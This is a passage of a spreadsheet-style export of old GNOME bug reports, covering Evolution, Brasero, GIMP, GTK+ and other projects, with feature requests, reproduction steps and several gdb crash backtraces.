#2  0xb7a14c4a in e_msgport_wait (mp=0x8169890) at e-msgport.c:511
	_buffer = {__routine = 0xb7a149a8  __arg = 0x8169890
__canceltype = 138125408 
  __prev = 0x0}
	msg = (EMsg *) 0xb7961ede
#3  0xb7a154eb in thread_dispatch (din=0x8181820) at e-msgport.c:874
	e = (EThread *) 0x8181820
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 3021335472
#4  0xb71f71ee in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb795503e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 5 (Thread -1264243792 (LWP 6336)):
#0  0xb71f9af1 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7961c77 in pthread_cond_wait () from /lib/tls/libc.so.6
No symbol table info available.
#2  0xb7a14c4a in e_msgport_wait (mp=0x81a0a68) at e-msgport.c:511
	_buffer = {__routine = 0xb7a149a8  __arg = 0x81a0a68
__canceltype = 136545696 
  __prev = 0x0}
	msg = (EMsg *) 0xb7961ede
#3  0xb7a154eb in thread_dispatch (din=0x8182a30) at e-msgport.c:874
	e = (EThread *) 0x8182a30
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 3030723504
#4  0xb71f71ee in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb795503e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread -1255855184 (LWP 6335)):
#0  0xb71f9af1 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7961c77 in pthread_cond_wait () from /lib/tls/libc.so.6
No symbol table info available.
#2  0xb7a14c4a in e_msgport_wait (mp=0x817f9a0) at e-msgport.c:511
	_buffer = {__routine = 0xb7a149a8  __arg = 0x817f9a0
__canceltype = 139552408 
  __prev = 0x0}
	msg = (EMsg *) 0xb7961ede
#3  0xb7a154eb in thread_dispatch (din=0x81659f0) at e-msgport.c:874
	e = (EThread *) 0x81659f0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x8227550
	self = 3039112112
#4  0xb71f71ee in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb795503e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread -1247466576 (LWP 6334)):
#0  0xb71f9af1 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7961c77 in pthread_cond_wait () from /lib/tls/libc.so.6
No symbol table info available.
#2  0xb7a14c4a in e_msgport_wait (mp=0x817f9a0) at e-msgport.c:511
	_buffer = {__routine = 0xb7a149a8  __arg = 0x817f9a0
__canceltype = 139550064 
  __prev = 0x0}
	msg = (EMsg *) 0xb7961ede
#3  0xb7a154eb in thread_dispatch (din=0x81659f0) at e-msgport.c:874
	e = (EThread *) 0x81659f0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x82252e8
	self = 3047500720
#4  0xb71f71ee in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb795503e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread -1239077968 (LWP 6333)):
#0  0xb71f9af1 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7961c77 in pthread_cond_wait () from /lib/tls/libc.so.6
No symbol table info available.
#2  0xb7a14c4a in e_msgport_wait (mp=0x817f9a0) at e-msgport.c:511
	_buffer = {__routine = 0xb7a149a8  __arg = 0x817f9a0
__canceltype = 137391152 
  __prev = 0x0}
	msg = (EMsg *) 0xb7961ede
#3  0xb7a154eb in thread_dispatch (din=0x81659f0) at e-msgport.c:874
	e = (EThread *) 0x81659f0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x822f888
	self = 3055889328
#4  0xb71f71ee in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb795503e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1230809408 (LWP 6326)):
#0  0xb79462f1 in read () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb6c1b5cd in _X11TransSocketRead (ciptr=0x20 buf=0x20 &lt;Address 0x20 out of
bounds&gt; size=32) at Xtranssock.c:2132
No locals.
#2  0xb6c1b88d in _X11TransRead (ciptr=0x20 buf=0x20 &lt;Address 0x20 out of
bounds&gt; size=32) at Xtrans.c:890
No locals.
#3  0xb6c1f399 in _XRead (dpy=0x8089b10 data=0xbfeb4e60 \001\002VK size=32)
at ../../src/XlibInt.c:1074
No locals.
#4  0xb6c203d8 in _XReply (dpy=0x8089b10 rep=0xbfeb4e60 extra=0 discard=1) at
../../src/XlibInt.c:1714
	cur_request = 84822
	cvl = (struct _XCVList *) 0x0
#5  0xb6c1807b in XSync (dpy=0x8089b10 discard=0) at ../../src/Sync.c:48
	rep = {type = 1 '\001' revertTo = 2 '\002' sequenceNumber = 19286 length =
0 focus = 46137475 pad1 = 4 
  pad2 = 0 pad3 = 140720 pad4 = 143081112 pad5 = 0}
#6  0xb6c18111 in _XSyncFunction (dpy=0x20) at ../../src/Synchro.c:37
No locals.
#7  0xb6bfc023 in XDrawLine (dpy=0x8089b10 d=46140554 gc=0x8155ae0 x1=32
y1=32 x2=32 y2=32)
    at ../../src/DrLine.c:96
	req = (xPolySegmentReq *) 0xb6ca566c
	segment = (xSegment *) 0x20
#8  0xb6edbd9f in _gdk_x11_have_render () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#9  0xb6eb79a2 in gdk_draw_segments () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#10 0xb6ec17c0 in gdk_pixmap_get_type () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#11 0xb6eb79a2 in gdk_draw_segments () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#12 0xb6ecc4dd in gdk_window_get_internal_paint_info () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#13 0xb6eb6e9b in gdk_draw_line () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#14 0xb67e324b in cl_draw_rectangle () from
/usr/lib/gtk-2.0/2.4.0/engines/libclearlooks.so
No symbol table info available.
#15 0xb67dc908 in clearlooks_rc_style_register_type () from
/usr/lib/gtk-2.0/2.4.0/engines/libclearlooks.so
No symbol table info available.
#16 0xb7097806 in gtk_paint_box () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#17 0xb706dda5 in gtk_range_get_adjustment () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#18 0xb703d7cc in _gtk_marshal_BOOLEAN__BOXED () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#19 0xb6bb7d75 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0xb6bb83a8 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0xb6bc6c9f in g_signal_stop_emission () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0xb6bc7ec3 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#23 0xb6bc84c3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0xb711f88f in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#25 0xb6fb5496 in gtk_container_propagate_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#26 0xb6fb54ed in gtk_container_propagate_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#27 0xb707b088 in gtk_scrolled_window_get_shadow_type () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#28 0xb6fb39da in gtk_container_forall () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0xb6fb5261 in gtk_container_get_focus_hadjustment () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#30 0xb707bdcb in _gtk_scrolled_window_get_scrollbar_spacing () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0xb703d7cc in _gtk_marshal_BOOLEAN__BOXED () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0xb6bb7d75 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#33 0xb6bb83a8 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0xb6bc6c9f in g_signal_stop_emission () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0xb6bc7ec3 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0xb6bc84c3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#37 0xb711f88f in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#38 0xb6fb5496 in gtk_container_propagate_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0xb6fb54ed in gtk_container_propagate_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0xb6f7adc8 in gtk_box_reorder_child () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#41 0xb6fb39da in gtk_container_forall () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#42 0xb6fb5261 in gtk_container_get_focus_hadjustment () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#43 0xb703d7cc in _gtk_marshal_BOOLEAN__BOXED () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#44 0xb6bb7d75 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#45 0xb6bb83a8 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#46 0xb6bc6c9f in g_signal_stop_emission () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#47 0xb6bc7ec3 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#48 0xb6bc84c3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#49 0xb711f88f in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#50 0xb6fb5496 in gtk_container_propagate_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#51 0xb6fb54ed in gtk_container_propagate_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#52 0xb6f7adc8 in gtk_box_reorder_child () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#53 0xb6fb39da in gtk_container_forall () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#54 0xb6fb5261 in gtk_container_get_focus_hadjustment () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#55 0xb703d7cc in _gtk_marshal_BOOLEAN__BOXED () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#56 0xb6bb7d75 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#57 0xb6bb83a8 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#58 0xb6bc6c9f in g_signal_stop_emission () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#59 0xb6bc7ec3 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#60 0xb6bc84c3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#61 0xb711f88f in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#62 0xb6fb5496 in gtk_container_propagate_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#63 0xb6fb54ed in gtk_container_propagate_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#64 0xb6f7769b in gtk_bin_get_type () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#65 0xb6fb39da in gtk_container_forall () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#66 0xb6fb5261 in gtk_container_get_focus_hadjustment () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#67 0xb713107d in gtk_window_get_position () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#68 0xb7632204 in bonobo_plug_set_control () from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#69 0xb703d7cc in _gtk_marshal_BOOLEAN__BOXED () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#70 0xb6bb7d75 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#71 0xb6bb83a8 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#72 0xb6bc6c9f in g_signal_stop_emission () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#73 0xb6bc7ec3 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#74 0xb6bc84c3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#75 0xb711f88f in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#76 0xb703c512 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#77 0xb6ecdbfa in gdk_window_clear_area_e () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#78 0xb6ecdccd in gdk_window_process_all_updates () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#79 0xb6fb3665 in gtk_container_check_resize () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#80 0xb6b4d6f0 in g_child_watch_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#81 0xb6b4b48e in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#82 0xb6b4e496 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#83 0xb6b4e783 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#84 0xb72c97dd in bonobo_main () at bonobo-main.c:395
	loop = (GMainLoop *) 0x81b9930
#85 0x08060722 in main ()
No symbol table info available.
#0  0xb78b4ab7 in raise () from /lib/tls/libc.so.6
(gdb) c
Continuing.
Program exited with code 01.
(gdb) 
debug backtrace from gdb</t>
  </si>
  <si>
    <t>JHBUILD-417767</t>
  </si>
  <si>
    <t>Should workaround mozilla/firefox braindeadness with nss includes for tarball modules too</t>
  </si>
  <si>
    <t>See http://live.gnome.org/JhbuildIssues/evolution-data-server specifically about nss includes.  GARNOME works around this longstanding build issue of mozilla/firefox.  So does jhbuild--if building from cvs.  However if building mozilla/firefox from tarballs jhbuild doesn't do the manual copy of nss includes causing evolution-data-server and other modules to break not being able to find ssl.h.
We temporarily continued to allow GNOME to depend on the cvs version of mozilla during the 2.17.x cycle since there was a promise of a xulrunner-1.8.1 'soon' (which never came).  But we're not repeating the mistake.  So we will soon make everyone build mozilla from tarballs which means this bug will soon affect everyone...
I'll try to get around to figuring out the patch soon if no one else does but I'm hoping someone else wants to beat me to it.  :-)</t>
  </si>
  <si>
    <t>BRASERO-437148</t>
  </si>
  <si>
    <t>add percentage in title bar</t>
  </si>
  <si>
    <t>It would be nice if (the very promising) brasero would show a percentage or time of the progress in the title bar while burning a cd/dvd. In this way the user can keep an eye on the progress while working in another application.
e.g.:
Burning DVD [58%]
or
Burning DVD [1:25 minutes left]
Other information:</t>
  </si>
  <si>
    <t>woutervanwijk</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-258426</t>
  </si>
  <si>
    <t>Evolution give Crash message when try to subscribe to other user's folder.</t>
  </si>
  <si>
    <t>Description of Problem:
When I tried to subscribe to other user's folders Evolution had given crash
message even though it didnt crash completely.
Steps to reproduce the problem:
1. Go to exchange view.
2. Select from menu bar Action-&gt;Subscribe-to-other-user's-folders
3. Give the user name and select the folder and select ok.
Actual Results:
Evolution will give crash message.
Expected Results:
It should give permission or deny to permit if other user doesn't had given
the permission.
How often does this happen? 
Everytime
Additional Information:
After closing the crash message we can use other operations like viewing
other views-contactscalendermailetc.
Back trace of the crash:
(gdb) thread apply all bt
Thread 4 (Thread 49156 (LWP 2835)):
#0  0x41500b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x415009d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
#2  0x414fce90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x41582cc0 in g_async_queue_pop_intern_unlocked (queue=0x810df30 try=0
    end_time=0x0) at gasyncqueue.c:226
#4  0x41582f5c in g_async_queue_pop_unlocked (queue=0x810df30)
    at gasyncqueue.c:288
#5  0x415b9761 in g_thread_pool_thread_proxy (data=0x810df08)
    at gthreadpool.c:96
#6  0x415b8416 in g_thread_create_proxy (data=0x80eb618) at gthread.c:558
#7  0x414fdf60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#8  0x41970327 in clone () from /lib/i686/libc.so.6
Thread 3 (Thread 16386 (LWP 2815)):
#0  0x41967b66 in poll () from /lib/i686/libc.so.6
#1  0x4159cefc in g_main_context_poll (context=0x8156d10 timeout=-1
    priority=2147483647 fds=0x818e9a8 n_fds=11) at gmain.c:2850
#2  0x4159c041 in g_main_context_iterate (context=0x8156d10 block=1
    dispatch=1 self=0x8116ed8) at gmain.c:2527
#3  0x4159ca54 in g_main_loop_run (loop=0x8156e10) at gmain.c:2752
---Type  to continue or q  to quit---
#4  0x4144e7ee in link_thread_io_context ()
   from /opt/gnome/lib/libORBitCosNaming-2.so.0
#5  0x415b8416 in g_thread_create_proxy (data=0x8116ed8) at gthread.c:558
#6  0x414fdf60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#7  0x41970327 in clone () from /lib/i686/libc.so.6
Thread 2 (Thread 32769 (LWP 2814)):
#0  0x41967b66 in poll () from /lib/i686/libc.so.6
#1  0x414fda8e in __pthread_manager () from /lib/i686/libpthread.so.0
#2  0x41970327 in clone () from /lib/i686/libc.so.6
Thread 1 (Thread 16384 (LWP 2813)):
#0  0x41504ab6 in waitpid () from /lib/i686/libpthread.so.0
#1  0x40a6500c in libgnomeui_module_info_get ()
   from /opt/gnome/lib/libgnomeui-2.so.0
#2  0x4150396c in __pthread_sighandler () from /lib/i686/libpthread.so.0
#3  
#4  0x4094085c in proxified_status (conn=0x81f7aa8 status=2)
    at soup-connection.c:338
#5  0x40940127 in soup_connection_connect_sync (conn=0x81f7aa8)
    at soup-connection.c:535
#6  0x4095277b in wait_for_connection (session=0x8170e48 msg=0x826bec8)
    at soup-session-sync.c:111
---Type  to continue or q  to quit---
#7  0x4095290c in send_message (session=0x8170e48 msg=0x826bec8)
    at soup-session-sync.c:168
#8  0x40951c7c in soup_session_send_message (session=0x8170e48 msg=0x826bec8)
    at soup-session.c:1184
#9  0x0809b290 in e2k_context_send_message (ctx=0x816f538 op=0x0
    msg=0x826bec8) at e2k-context.c:838
#10 0x0809cc45 in e2k_context_propfind (ctx=0x816f538 op=0x0
    uri=0x81f4e08 http://NICEL-WIN2K.nicel.com/exchange/u1/NON_IPM_SUBTREE
    props=0xbffff028 nprops=1 results=0xbffff008 nresults=0xbffff004)
    at e2k-context.c:1625
#11 0x08064ca7 in exchange_account_get_standard_uri_for (account=0x8171cf8
    home_uri=0x8175920 http://NICEL-WIN2K.nicel.com/exchange/u1/
    std_uri_prop=0x80d2aa1 urn:schemas:httpmail:calendar)
    at exchange-account.c:1215
#12 0x0806aaa4 in create_internal (hier=0x8176788 parent=0x8174ad8
    name=0x82663b8 Calendar type=0x0 folder_out=0xbffff108)
    at exchange-hierarchy-foreign.c:292
#13 0x0806aeb2 in exchange_hierarchy_foreign_add_folder (hier=0x8176788
    folder_name=0x82663b8 Calendar folder=0xbffff108)
    at exchange-hierarchy-foreign.c:460
#14 0x08063847 in exchange_account_discover_shared_folder (account=0x8171cf8
    user=0x8264bd8 u1@nicel.com folder_name=0x82663b8 Calendar
    folder=0xbffff108) at exchange-account.c:601
---Type  to continue or q  to quit---
#15 0x08070ba1 in discover_shared_folder (storage=0x816f0d0
    owner=0x8264bd8 u1@nicel.com folder_name=0x82663b8 Calendar
    callback=0x80783af 
    user_data=0x820be70) at exchange-storage.c:290
#16 0x0807ffe1 in e_storage_async_discover_shared_folder (storage=0x816f0d0
    owner=0x8264bd8 u1@nicel.com folder_name=0x82663b8 Calendar
    callback=0x80783af  data=0x820be70)
    at e-storage.c:521
#17 0x0807858a in discover_folder (storage_set_view=0x81945f0
    user_email_address=0x8264bd8 u1@nicel.com
    storage_name=0x8263258 chethan@nicel.com
    folder_name=0x82663b8 Calendar) at e-folder-misc-dialogs.c:678
#18 0x08078679 in e_folder_add_foreign_dialog (storage_set_view=0x81945f0)
    at e-folder-misc-dialogs.c:703
#19 0x08073148 in do_subscribe_user (component=0x81e5788 user_data=0x818f290
    cname=0x81e8ac8 ExchangeSubscribeUser) at xc-commands.c:111
#20 0x40af603f in bonobo_socket_add_id ()
   from /opt/gnome/lib/libbonoboui-2.so.0
#21 0x414bdde4 in g_closure_invoke (closure=0x81e76d8
    return_value=0xbffff3b0 n_param_values=2 param_values=0x81e9150
    invocation_hint=0x0) at gclosure.c:437
#22 0x4122b187 in bonobo_closure_invoke_va_list ()
   from /opt/gnome/lib/libbonobo-2.so.0
---Type  to continue or q  to quit---
#23 0x4122b412 in bonobo_closure_invoke () from /opt/gnome/lib/libbonobo-2.so.0
#24 0x40af5e70 in bonobo_socket_add_id ()
   from /opt/gnome/lib/libbonoboui-2.so.0
#25 0x4122c1d2 in _ORBIT_skel_small_Bonobo_UIComponent_execVerb ()
   from /opt/gnome/lib/libbonobo-2.so.0
#26 0x41487b34 in ORBit_POA_setup_root () from /opt/gnome/lib/libORBit-2.so.0
#27 0x4148cb51 in ORBit_OAObject_invoke () from /opt/gnome/lib/libORBit-2.so.0
#28 0x41475008 in ORBit_small_invoke_adaptor ()
   from /opt/gnome/lib/libORBit-2.so.0
#29 0x41488048 in ORBit_recv_buffer_return_sys_exception ()
   from /opt/gnome/lib/libORBit-2.so.0
#30 0x41488260 in ORBit_recv_buffer_return_sys_exception ()
   from /opt/gnome/lib/libORBit-2.so.0
#31 0x4146de86 in giop_thread_queue_process ()
   from /opt/gnome/lib/libORBit-2.so.0
#32 0x4146d4b3 in giop_thread_same_key () from /opt/gnome/lib/libORBit-2.so.0
#33 0x41452793 in link_servers_move_io_T ()
   from /opt/gnome/lib/libORBitCosNaming-2.so.0
#34 0x4159a7cd in g_main_dispatch (context=0x810d518) at gmain.c:1905
#35 0x4159bb39 in g_main_context_dispatch (context=0x810d518) at gmain.c:2451
#36 0x4159c06c in g_main_context_iterate (context=0x810d518 block=1
    dispatch=1 self=0x80f1608) at gmain.c:2532
#37 0x4159ca54 in g_main_loop_run (loop=0x815b008) at gmain.c:2752
---Type  to continue or q  to quit---
#38 0x41218726 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#39 0x08073c06 in main (argc=3 argv=0xbffff984) at main.c:190
#0  0x41504ab6 in waitpid () from /lib/i686/libpthread.so.0
(gdb)</t>
  </si>
  <si>
    <t>EVOLUTION-220371</t>
  </si>
  <si>
    <t>mailto parser broken</t>
  </si>
  <si>
    <t>Description of Problem:
The way mailto urls are parsed prevents using &amp; or
? in the subject or body.  Even when using %26 for
&amp; it won't work.  It seems to convert to the
actual characters before parsing.
Steps to reproduce the problem:
1. Run evolution mailto:?Subject=Bug&amp;Body=foo%26bar 
2. Also try evolution
mailto:?Subject=Bug%26Body=foobar
Actual Results:
In step 1 you get Bug in the subject and foo
in the body.
In step 2 you get Bug in the subject and
foobar in the body.
Expected Results:
In step 1 you should get Bug in the subject and
foo&amp;bar in the body.
In step 2 you should get Bug&amp;Body=foobar in the
subject and nothing in the body.
How often does this happen? 
Consistently.
Additional Information:
I discovered this bug using the Send link to
feature in galeon unstable.  If a url had
characters like &amp; or ? it would get cut off in
evolution.</t>
  </si>
  <si>
    <t>brian.hk</t>
  </si>
  <si>
    <t>EKIGA-346735</t>
  </si>
  <si>
    <t>OPAL</t>
  </si>
  <si>
    <t>Failed to build opal on solaris</t>
  </si>
  <si>
    <t>Please describe the problem:
Failed to build opal on solaris
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>eagle.lu</t>
  </si>
  <si>
    <t>EPIPHANY-EXTENSIONS-324599</t>
  </si>
  <si>
    <t>EPIPHANY-EXTENSIONS</t>
  </si>
  <si>
    <t>News Feed Subscription window should ellipsise URLs</t>
  </si>
  <si>
    <t>Currently the News Feed Subscription window does not ellipsise URLs which causes the window to be made wide enough to fit the entire URL. If you have a feed with a very long URL (such as the new feeds for gnome bugzilla queries) then this can cause the window to be several times wider than the screen.
Having the URLs ellipsised and a sane window width would be good.
(Epiphany 1.9.3.1 + Epiphany Extensions 1.9.3 on Ubuntu Dapper)</t>
  </si>
  <si>
    <t>epiphany-extensions-maint</t>
  </si>
  <si>
    <t>doclivingston</t>
  </si>
  <si>
    <t>GPDF-112140</t>
  </si>
  <si>
    <t>GPDF</t>
  </si>
  <si>
    <t>[PageUp] and [PageDown] behaviour is broken</t>
  </si>
  <si>
    <t>If I open up a PDF document in gpdf the [PageUp] and [PageDown] keys do
not initially work. However I can hit the up-arrow or down-arrow key
(twice) and then the arrow keys work. At this point [PageUp] also starts
to work (moving up one screenful at a time which is good -- see below).
However [PageDown] does not work unless I use the arrows to move to the
bottom of the page. At that point [PageDown] will move by one  physical
page at a time in the document (so if an entire page does not fit on the
screen I cannot read the top portions of the page).
There really needs to be a pair of keys that allow one to move forwards and
backwards through the document with a single keypress moving one key at a
time. In xpdf this is done by [PageUp] and [PageDown] _and_ by [Space] and
[Backspace]. So if you are motivated by this report to make [PageUp] and
[PageDown] work on physical (document) pages please include another
keybinding to move a screenful at a time.</t>
  </si>
  <si>
    <t>malcolm</t>
  </si>
  <si>
    <t>PYGTK-62464</t>
  </si>
  <si>
    <t>GdkColor(r g b) should take unsigned shorts and not signed shorts</t>
  </si>
  <si>
    <t>Well the 'problem' is here :
static PyObject *_wrap_gdk_color_new(PyObject *self PyObject *args) {
    GdkColor gdk_color
    if (!PyArg_ParseTuple(args hhhl:gdk_color_new
                          &amp;(gdk_color.red) &amp;(gdk_color.green)
                          &amp;(gdk_color.blue) &amp;(gdk_color.pixel)))
        return NULL
    return PyGdkColor_New(
}                                                                         
I think it should be 'iii' (as unsigned short ints do not seem to exist in
Python or at least in the documentation I saw of PyArg_ParseTuple) store
this in 'temporary' variables and then check for overflow between 0 and
65535. If overflow raise an exception.
Or add a way to get 'unsigned shorts' with PyArg_ParseTuple :-)</t>
  </si>
  <si>
    <t>kiko</t>
  </si>
  <si>
    <t>lionel.ulmer</t>
  </si>
  <si>
    <t>NAUTILUS-155852</t>
  </si>
  <si>
    <t>cleanup eel functions now in gnome vfs</t>
  </si>
  <si>
    <t>I was looking for users of eel_make_uri_from_shell_arg that has been moved
verbatim to gnome-vfs since 2.2.
Along the way I noticed that the only other function from eel-vfs-extensions
used in the file was eel_uris_match which has been moved to gnome-vfs as well so
I cleaned that up too in the nautilus tree.
Once this and and bug #155841 (get rid of eel_uri_from_shell in eog) have been
applied eel_uri_from_shell_arg can be removed from eel since there arent any
users left.
The same is not true for eel_uris_match since the _ignore_fragments variant has
not a gnome_vfs equivalent.</t>
  </si>
  <si>
    <t>GIMP-84145</t>
  </si>
  <si>
    <t>Narrow straight lines are imprecise</t>
  </si>
  <si>
    <t>Imprecision in the straight line feature of the Pen tool can be seen 
when using a thin brush. The actual kind of imprecision depends on the 
zoom level. Here's an example:
1. Create a new image the default 256x256 rgb will do.
2. Select the pencil tool
3. Select the pixel (1x1 square) brush
4. Make sure the zoom level is 1:1
5. Place a pixel at position(100110) with a single click.
6. Change to a different drawing color.
7. Move mouse to position(110100). Hold down shift and click.
8. Now zoom in to 1600% and see the result: A nice line from position
   (100109) to (109100). One would have expected a line from
   (100110) to (110100).
9. Undo the drawing actions. Then repeat steps 4-8 but this time
   holding shift AND ctrl before drawing the line. The result is now a
   line from (100109) to (108101).
9. While zoomed try to draw some more diagonal lines. Most of them
   will look pretty horrible mostly twice as thick as the lines
   drawn in 1:1. Increasing the brush spacing to 100% makes them look
   a little less horrible but they are still seldom uniform and don't
   always connect the points one clicks to draw them.</t>
  </si>
  <si>
    <t>makholm-640nospam</t>
  </si>
  <si>
    <t>GIMP-GAP-314495</t>
  </si>
  <si>
    <t>video menu</t>
  </si>
  <si>
    <t>Problem with Video/MovePath/ Save Button in the Edit Controlpoints</t>
  </si>
  <si>
    <t>Please describe the problem:
My problem is simple.
I work with the french version of gimp-gap
When one creates a path
it's normally possible to save it
by clicking the save button in the
Edit ControlPoints Panel and then by
validating a frame.path_points file.
Unfortunately the validate button is
inactive and nothing is done when
I'm clicking on.
Only the cancel button is active :(
Thanks for your help.
Diego.
Steps to reproduce:
1. In the Video menu
2. Choose Move Path
3. Click on the save button in the Edit ControlPoints Panel
4. Click to validate a frame.path_points file
Actual results:
=&gt; Nothing is done :( 
Expected results:
Instead of saving the path
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>david.fournier</t>
  </si>
  <si>
    <t>GTK+-55584</t>
  </si>
  <si>
    <t>TripleClick in multi-line text widget</t>
  </si>
  <si>
    <t>TripleClick on the multi-line text widgets doesn't work.  You should be
able to triple-click and the entire text in the widget should highlight. 
We use this frequently to copy and paste between packages and to stike out
large sections of text.
This might be a Motif behaviour that I am just used to?  Do GTK
applications do this?</t>
  </si>
